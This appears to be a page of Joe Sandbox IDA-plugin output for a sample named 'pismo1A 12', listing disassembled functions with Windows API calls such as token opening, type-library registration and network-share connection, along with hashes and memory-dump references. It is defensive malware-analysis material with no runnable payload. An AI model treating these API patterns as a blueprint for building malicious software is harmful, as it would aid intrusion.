Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: e597fe5e62e06e562f9e0594dfd7d4fae314687b7264613e4546f391bcba642b
Instruction ID: edd2abc9aee5fe55d9f69aba9c4503bcc2604d87a9ae14280b7b4d9d1dd34b29
Opcode Fuzzy Hash: e597fe5e62e06e562f9e0594dfd7d4fae314687b7264613e4546f391bcba642b
Instruction Fuzzy Hash: 30012B32B01332ABDB314B78AC449977B9AAF45BA1B144621F905F3340C725D901C7E5

Function 00707464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0070747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00707497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007074AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007074CA

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 6d1567be12768acec095c2abfc6ca679bb89b66d0e84741a46ab2091b8faa430
Instruction ID: f20017c2cd0a21f5da66b260f78f5a117a39ab113914098605e7c7b22555c907
Opcode Fuzzy Hash: 6d1567be12768acec095c2abfc6ca679bb89b66d0e84741a46ab2091b8faa430
Instruction Fuzzy Hash: E211ADB5A05394EBF7208F14EC08B927FFCEB00B14F108669B656E6191D7B8F904DB60

Function 0070B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B126

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: a9fb99f5097d2894675ade070509fc051c3149b9fbc73718ef788bd10052e62c
Instruction ID: 0b2c0422e17d6ef115876d7dc00a661382cb1836530c4f3ca71b4c57bceff1bb
Opcode Fuzzy Hash: a9fb99f5097d2894675ade070509fc051c3149b9fbc73718ef788bd10052e62c
Instruction Fuzzy Hash: CC118471C0151CD7DF009FE4D9596EEBFB8FF09711F108185D941B2181CB385A50DB55

Function 00702DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00702DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00702DD6
GetCurrentThreadId.KERNEL32 ref: 00702DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00702DE4

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 8212fda1a2ff21b1d632b69b5ab4c4a5551e28113e5fe18a940c64bb2e3f6dea
Instruction ID: 02bfa9d0bdbf2e4fe957939f8c9f060981df0cff9d479c62a1d2a538034b92a0
Opcode Fuzzy Hash: 8212fda1a2ff21b1d632b69b5ab4c4a5551e28113e5fe18a940c64bb2e3f6dea
Instruction Fuzzy Hash: 2EE09272201224FBEB211B729C0FFEB3EACEF42BA2F004115F105E10819AA8C841C7B1

Function 00738863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 006B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006B9693
Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96A2
Part of subcall function 006B9639: BeginPath.GDI32(?), ref: 006B96B9
Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00738887
LineTo.GDI32(?,?,?), ref: 00738894
EndPath.GDI32(?), ref: 007388A4
StrokePath.GDI32(?), ref: 007388B2

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 0c5e8b587a6ed49cd5ae2d23818e9cb5e35bfbce6b9f63c52e6a763fa4a63347
Instruction ID: 8eec4a073444d2d3fff57d012b1bbc74a0a9df9a9f22f90607adb9cee09bdd28
Opcode Fuzzy Hash: 0c5e8b587a6ed49cd5ae2d23818e9cb5e35bfbce6b9f63c52e6a763fa4a63347
Instruction Fuzzy Hash: FBF03A36045698BAEB135FA8AC09FCA3B69AF06311F44C000FB12751E2C7795551DFA9

Function 006B98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 006B98CC
SetTextColor.GDI32(?,?), ref: 006B98D6
SetBkMode.GDI32(?,00000001), ref: 006B98E9
GetStockObject.GDI32(00000005), ref: 006B98F1

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 2a41c673396df09ed3783340c870f523bb16b5ead75e28fb3f5589f167298d88
Instruction ID: 04af1a20d3a586305edd793162be9faf7095f4bed8262a695bf49f33e2f2e153
Opcode Fuzzy Hash: 2a41c673396df09ed3783340c870f523bb16b5ead75e28fb3f5589f167298d88
Instruction Fuzzy Hash: 1EE06571244248AAEB225B74AC09BE83F51AB11336F14C219F7F5641E1C77646509B10

Function 0070162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00701634
OpenThreadToken.ADVAPI32(00000000,?,?,?,007011D9), ref: 0070163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007011D9), ref: 00701648
OpenProcessToken.ADVAPI32(00000000,?,?,?,007011D9), ref: 0070164F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 50767dcca5e92bfe05ae0758b8a23f5a84c848f36bd1bd2bf3aafd09a7d2f003
Instruction ID: 7dc8b0f16886b695d5dd9cba436ebc7a642361c0cc47068848f1b66d2a0d3002
Opcode Fuzzy Hash: 50767dcca5e92bfe05ae0758b8a23f5a84c848f36bd1bd2bf3aafd09a7d2f003
Instruction Fuzzy Hash: FBE08C72602211EBE7201FA0AE0DB873BBCAF44793F14C808F245E9080EB3D8444CB68

Function 006FD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 006FD858
GetDC.USER32(00000000), ref: 006FD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006FD882
ReleaseDC.USER32(?), ref: 006FD8A3

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3ece94bd57b17d5a8f4072df4cf53a6f6cdbcd7a45fc5fca08de0bf7cc6a66de
Instruction ID: f5f5fc4ad36d06a530f72a7a13abaae68169aff388d09403a812d63e302e9392
Opcode Fuzzy Hash: 3ece94bd57b17d5a8f4072df4cf53a6f6cdbcd7a45fc5fca08de0bf7cc6a66de
Instruction Fuzzy Hash: 24E01AB1800204EFDB42AFA0D80D66DBBB2FB08312F10C009F946F7260C73D9942AF44

Function 006FD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 006FD86C
GetDC.USER32(00000000), ref: 006FD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006FD882
ReleaseDC.USER32(?), ref: 006FD8A3

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 33a6034bc7d28313913e6f958dd6ec4f833f5941a7932fce9e9c97da1c2eef1c
Instruction ID: 06053dd8a283a46042be5f26486f9f8030e6ca08c2904ad3db02b4296109c6cc
Opcode Fuzzy Hash: 33a6034bc7d28313913e6f958dd6ec4f833f5941a7932fce9e9c97da1c2eef1c
Instruction Fuzzy Hash: FAE01AB1800200DFDB42AFA0D80D66DBBB2BB08312F108008F946F7260C73D99019F44

Function 00714D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00714ED4

Strings

LPT, xrefs: 00714DFB
*, xrefs: 00714E10

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 3fa4bab9b08f4f2f0204a71f25f5635ff532015668400a4fe83fd4f6a6b67602
Instruction ID: 380d792099f740d35a200d0cdd7255964960e6ab881e309ca01922026dbfb50d
Opcode Fuzzy Hash: 3fa4bab9b08f4f2f0204a71f25f5635ff532015668400a4fe83fd4f6a6b67602
Instruction Fuzzy Hash: E2914F75A002049FDB14DF58C484EA9BBF5BF49314F19809DE80A9F3A2D735EE86CB91

Function 006CE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006CE30D

Strings

pow, xrefs: 006CE2E5, 006CE302

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 8739af0257dc86b25a4d7807a658649d64bd2f55c0986f66fdd62dcc056fcae8
Instruction ID: d0699a20efbd56ded19ee46f85ee4a60b0237fe4a4f69d456a7cd55e7b5d96e0
Opcode Fuzzy Hash: 8739af0257dc86b25a4d7807a658649d64bd2f55c0986f66fdd62dcc056fcae8
Instruction Fuzzy Hash: A9512C61E0C20196CB157714C901BF93BB7DF40740F748D5EF495423A9FB3A8D969A8B

Function 00727771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(006F569E,00000000,?,0073CC08,?,00000000,00000000), ref: 007278DD

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

CharUpperBuffW.USER32(006F569E,00000000,?,0073CC08,00000000,?,00000000,00000000), ref: 0072783B

Strings

<sv, xrefs: 007277C8

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <sv
API String ID: 3544283678-1866742746
Opcode ID: f63d274619b22cb2eae6aea58a7e7388630abd9a8e31dee809daeeabf61d6622
Instruction ID: 2719ef12dbf4142b5d545e4ae0fa7c60a60d5c05b4627e4333154bc40ddd2099
Opcode Fuzzy Hash: f63d274619b22cb2eae6aea58a7e7388630abd9a8e31dee809daeeabf61d6622
Instruction Fuzzy Hash: 57614B72914228AACF48FBE4DD91DFDB379BF15300B444129F542A7191EF38AE49CBA4

Function 006BE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 006BE1B1

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: ff2f4bf432a8d9bfe4132cc2001fc11cfe91351041b8c99175a16080483e32e8
Instruction ID: d498d0343c4267ab09f3b0037ba25a3556cdfb5c41fc35754e43c592c5d0c357
Opcode Fuzzy Hash: ff2f4bf432a8d9bfe4132cc2001fc11cfe91351041b8c99175a16080483e32e8
Instruction Fuzzy Hash: B651357550424ADFDB15EF28C4816FA7FA6EF15310F248069F9519B3E0D6369E83CBA0

Function 006BF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 006BF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 006BF2BB

Strings

@, xrefs: 006BF2AF

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 8a3460f0d368455acd96c9631a9675e70b5470ff22ccae4e73a992ff0629645b
Instruction ID: 47adc3b50507cccab70cc0f8a9a120fe0df1137806193d7eedc84049402fbd54
Opcode Fuzzy Hash: 8a3460f0d368455acd96c9631a9675e70b5470ff22ccae4e73a992ff0629645b
Instruction Fuzzy Hash: 7E5155714087449FD360AF10DC86BABBBF9FFC5311F81884CF199411A5EB709929CB6A

Function 00725745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 007257E0
_wcslen.LIBCMT ref: 007257EC

Strings

CALLARGARRAY, xrefs: 007257E6, 007257EB

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 147fa01415960423ab8835a6ce78ead47cd7790142c07e0d07552d6ee7758848
Instruction ID: 1ca4833f12977a7e57f3f1131e7467ff8c43b1360961df917bb079ba9e2b9047
Opcode Fuzzy Hash: 147fa01415960423ab8835a6ce78ead47cd7790142c07e0d07552d6ee7758848
Instruction Fuzzy Hash: F541AE71A00219DFCB04EFA8D8858BEBBF5FF59320F10412DE505AB291E7789D81CBA0

Function 0071D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0071D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0071D13A

Strings

|, xrefs: 0071D10B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: b081ea02184302a211d628678fecbb037cb01e53efa27388ee23cc059e99d891
Instruction ID: d5d04fed221c9a48561f98829a212e64ff3283cf51d3883e79be08875709a305
Opcode Fuzzy Hash: b081ea02184302a211d628678fecbb037cb01e53efa27388ee23cc059e99d891
Instruction Fuzzy Hash: 89314C71D00219ABCF55EFA4CC85AEEBFBAFF05304F000019F915A6161EB35AA46DF64

Function 0073356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00733621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0073365C

Strings

static, xrefs: 007335BC

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 72ac8f72751d4ba2bdf03acf71cf2c5ecc140561ba7fa36424d601e69bc398c0
Instruction ID: e92b48c008ba8289c84592fb4b4fd11d28e21c16e2dce4cd9a2c3078971cc167
Opcode Fuzzy Hash: 72ac8f72751d4ba2bdf03acf71cf2c5ecc140561ba7fa36424d601e69bc398c0
Instruction Fuzzy Hash: 09318F71110204AEEB209F38DC41EFB73A9FF88720F00961DF8A5D7291DA39AD91C764

Function 00734537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0073461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00734634

Strings

', xrefs: 0073458E

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: f7924947cd4043820ad57696475f9a79a8aaa65c02c5733c0a50822a31dbc231
Instruction ID: bd5460d5464f1494abc2f3d9e8183eda24a51825f66d06cf66b74de01e418e8e
Opcode Fuzzy Hash: f7924947cd4043820ad57696475f9a79a8aaa65c02c5733c0a50822a31dbc231
Instruction Fuzzy Hash: 9C312775A01219DFEB18CFA9C981BDABBB5FF09300F10406AE904AB342D774A951CF90

Function 006A3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006E33A2

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 006A3A04

Strings

Line: , xrefs: 006E33EB

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: e23e8e0835f42d571231cbd8bbff9a03cb9e3f6c2c8b8f672983a965e9f7df88
